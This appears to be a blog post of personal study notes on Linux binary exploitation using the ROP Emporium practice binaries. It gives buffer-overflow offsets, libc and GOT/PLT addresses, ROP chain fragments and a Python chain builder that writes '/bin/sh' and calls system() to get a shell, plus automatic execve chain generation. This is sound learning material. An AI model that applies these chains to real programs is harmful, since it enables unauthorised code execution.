It does not matter how slowly you go, as long as you do not stop.


Friday, 26 October 2018

Summary : Linux Binary Exploitation

This article is a summary of the last two weeks spent trying to learn Linux binary exploitation, written as personal notes that may be useful later on. As in earlier articles, I only try out what other people have written, to understand Linux binary exploitation bit by bit. These are the references used while learning:

https://github.com/nnamon/linux-exploitation-course
https://ropemporium.com/guide.html
https://github.com/abatchy17/ROP-Emporium

Linux Binary Protection

https://github.com/nnamon/linux-exploitation-course/blob/master/lessons/5_protections/lessonplan.md

Finding the offset of the saved return address (gdb-peda):

# gdb ./write432
gdb-peda$ pattern create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3A\
AIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAm\
ARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
gdb-peda$ pattern offset 0x41414641
1094796865 found at offset: 44
gdb-peda$

Shared libraries the binary loads (ldd):

$ ldd callme
 linux-vdso.so.1 (0x00007fff306bd000)
 libcallme.so => ./libcallme.so (0x00007fd3c2179000)
 libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fd3c1fa1000)
 /lib64/ld-linux-x86-64.so.2 (0x00007fd3c237d000)

Identifying the local libc and looking up its symbol offsets (libc-database):

https://github.com/niklasb/libc-database
$ ./add /lib/i386-linux-gnu/libc.so.6
$ ./dump local-0490256d1290b4c4fb59f37f9d3d87226d6500e6
offset___libc_start_main_ret = 0x199a1
offset_system = 0x0003d870
offset_dup2 = 0x000e6f60
offset_read = 0x000e6470
offset_write = 0x000e6540
offset_str_bin_sh = 0x17c968

Listing functions and imports (radare2):

# r2 -d write432

[0xf7f7d250]> aaa
[0xf7f7d250]> afl
0x080483c0    3 35           sym._init
0x08048400    1 6            sym.imp.printf
0x08048410    1 6            sym.imp.fgets
0x08048420    1 6            sym.imp.puts
0x08048430    1 6            sym.imp.system
0x08048440    1 6            sym.imp.__libc_start_main
0x08048450    1 6            sym.imp.setvbuf
0x08048460    1 6            sym.imp.memset
0x08048470    1 6            sub.__gmon_start_470
0x08048480    1 33           entry0
0x080484b0    1 4            sym.__x86.get_pc_thunk.bx
0x080484c0    4 43           sym.deregister_tm_clones
0x080484f0    4 53           sym.register_tm_clones
0x08048530    3 30           sym.__do_global_dtors_aux
0x08048550    4 43   -> 40   entry1.init
0x0804857b    1 123          sym.main
0x080485f6    1 86           sym.pwnme
0x0804864c    1 25           sym.usefulFunction
0x08048680    4 93           sym.__libc_csu_init
0x080486e0    1 2            sym.__libc_csu_fini
0x080486e4    1 20           sym._fini

PLT stub of system, which jumps through its GOT slot at 0x804a018 (objdump):

# objdump -d write432 -j .plt

08048430 <system@plt>:
 8048430: ff 25 18 a0 04 08     jmp    *0x804a018
 8048436: 68 18 00 00 00        push   $0x18
 804843b: e9 b0 ff ff ff        jmp    80483f0 <.plt>

GOT slots for the imported functions (readelf):

# readelf --relocs write432

Relocation section '.rel.dyn' at offset 0x368 contains 4 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
08049ffc  00000506 R_386_GLOB_DAT    00000000   __gmon_start__
0804a040  00000a05 R_386_COPY        0804a040   stderr@GLIBC_2.0
0804a060  00000c05 R_386_COPY        0804a060   stdin@GLIBC_2.0
0804a064  00000905 R_386_COPY        0804a064   stdout@GLIBC_2.0

Relocation section '.rel.plt' at offset 0x388 contains 7 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
0804a00c  00000107 R_386_JUMP_SLOT   00000000   printf@GLIBC_2.0
0804a010  00000207 R_386_JUMP_SLOT   00000000   fgets@GLIBC_2.0
0804a014  00000307 R_386_JUMP_SLOT   00000000   puts@GLIBC_2.0
0804a018  00000407 R_386_JUMP_SLOT   00000000   system@GLIBC_2.0
0804a01c  00000607 R_386_JUMP_SLOT   00000000   __libc_start_main@GLIBC_2.0
0804a020  00000707 R_386_JUMP_SLOT   00000000   setvbuf@GLIBC_2.0
0804a024  00000807 R_386_JUMP_SLOT   00000000   memset@GLIBC_2.0

Writable sections, candidates for storing the "/bin/sh" string (rabin2):

# rabin2 -S write432
23 0x00000ffc     4 0x08049ffc     4 -rw- .got
24 0x00001000    40 0x0804a000    40 -rw- .got.plt
25 0x00001028     8 0x0804a028     8 -rw- .data
26 0x00001030     0 0x0804a040    44 -rw- .bss

write4: writing a string into .data with a pop/mov gadget pair (pwntools fragments)

32bit (write432: pop edi; pop ebp; ret and mov dword ptr [edi], ebp; ret)
# write the 4 bytes '/bin' into the data segment: edi = destination, ebp = value
payload += p32(pop_edi_ebp)
payload += p32(data_segment)
payload += '/bin'
payload += p32(mov_edi_ebp)
# the same four words again with data_segment + 4 and '/sh\x00' complete the string

64bit (write4: pop r14; pop r15; ret and mov qword ptr [r14], r15; ret)
# one 8-byte store: '/bin//sh' fills the whole word, so no separate NUL write is
# needed as long as the bytes after it in .data are still zero
payload += p64(pop_r14_r15)
payload += p64(data_segment)
payload += '/bin//sh'
payload += p64(mov_r14_r15)

32bit system() ROP
# cdecl: system@plt, a fake return address, then the pointer argument
payload += p32(system_plt)
payload += p32(0xdeadbeef)
payload += p32(data_segment)

64bit system() ROP
# SysV ABI: the first argument lives in rdi, so load it with pop rdi; ret first
payload += p64(pop_rdi)
payload += p64(data_segment)
payload += p64(system_plt)
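
The write4 and system() fragments above generalised into one chain builder for both the 32-bit and 64-bit flavours, as an added example that is not code from the original post or from ROP Emporium. It uses struct instead of pwntools' p32/p64 so it runs without pwntools, and every gadget address in it is a placeholder to be replaced with the output of ropper or ROPgadget for the real binary; the simulate_writes desk check only replays the chain's own stores, it does not run the target.

```python
import struct

def pack(width, value):
    """p32/p64 equivalent: little-endian word of the target's pointer width."""
    return struct.pack("<I" if width == 4 else "<Q", value)

def write_chain(string, data_addr, pop_gadget, mov_gadget, width):
    """Store string plus a NUL terminator at data_addr, one width-byte chunk per
    gadget pair. pop_gadget pops the destination first and the value second
    (pop edi; pop ebp; ret / pop r14; pop r15; ret); mov_gadget stores the
    value at [destination] (mov [edi], ebp / mov [r14], r15)."""
    data = string + b"\x00"
    chain = b""
    for off in range(0, len(data), width):
        chunk = data[off:off + width].ljust(width, b"\x00")
        chain += pack(width, pop_gadget) + pack(width, data_addr + off)
        chain += chunk + pack(width, mov_gadget)
    return chain

def system_chain(system_addr, arg_addr, width, pop_rdi=None):
    """32-bit cdecl: the argument follows a fake return address (0xdeadbeef).
    64-bit SysV: the argument goes into rdi through a pop rdi; ret gadget."""
    if width == 4:
        return pack(4, system_addr) + pack(4, 0xDEADBEEF) + pack(4, arg_addr)
    return pack(8, pop_rdi) + pack(8, arg_addr) + pack(8, system_addr)

def simulate_writes(chain, pop_gadget, mov_gadget, width):
    """Desk check: replay every pop/mov pair in the chain and return the bytes
    they would leave in memory. This is not an emulator of the target."""
    fmt = "<I" if width == 4 else "<Q"
    words = [chain[i:i + width] for i in range(0, len(chain), width)]
    mem, i = {}, 0
    while i < len(words):
        if words[i] == pack(width, pop_gadget):
            dest = struct.unpack(fmt, words[i + 1])[0]
            assert words[i + 3] == pack(width, mov_gadget), "pop without mov"
            for k, byte in enumerate(words[i + 2]):
                mem[dest + k] = byte
            i += 4
        else:
            i += 1
    return bytes(mem[a] for a in range(min(mem), max(mem) + 1))

def payload(offset, *chains):
    """Padding up to the saved return address (44 bytes for write432 above),
    followed by the chains."""
    return b"A" * offset + b"".join(chains)
```

For write432 the values taken from the listings above are system_addr = 0x08048430 (system@plt) and data_addr = 0x0804a028 (.data); only the two gadget addresses still have to come from the gadget finder.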

ROPgadget / ropper (automatic chain generation; --badbytes 000a0d keeps gadget addresses free of 0x00, 0x0a and 0x0d)

$ ROPgadget --binary 1_staticnx  --ropchain
$ ropper --file ../Downloads/1_staticnx --chain execve --badbytes 000a0d
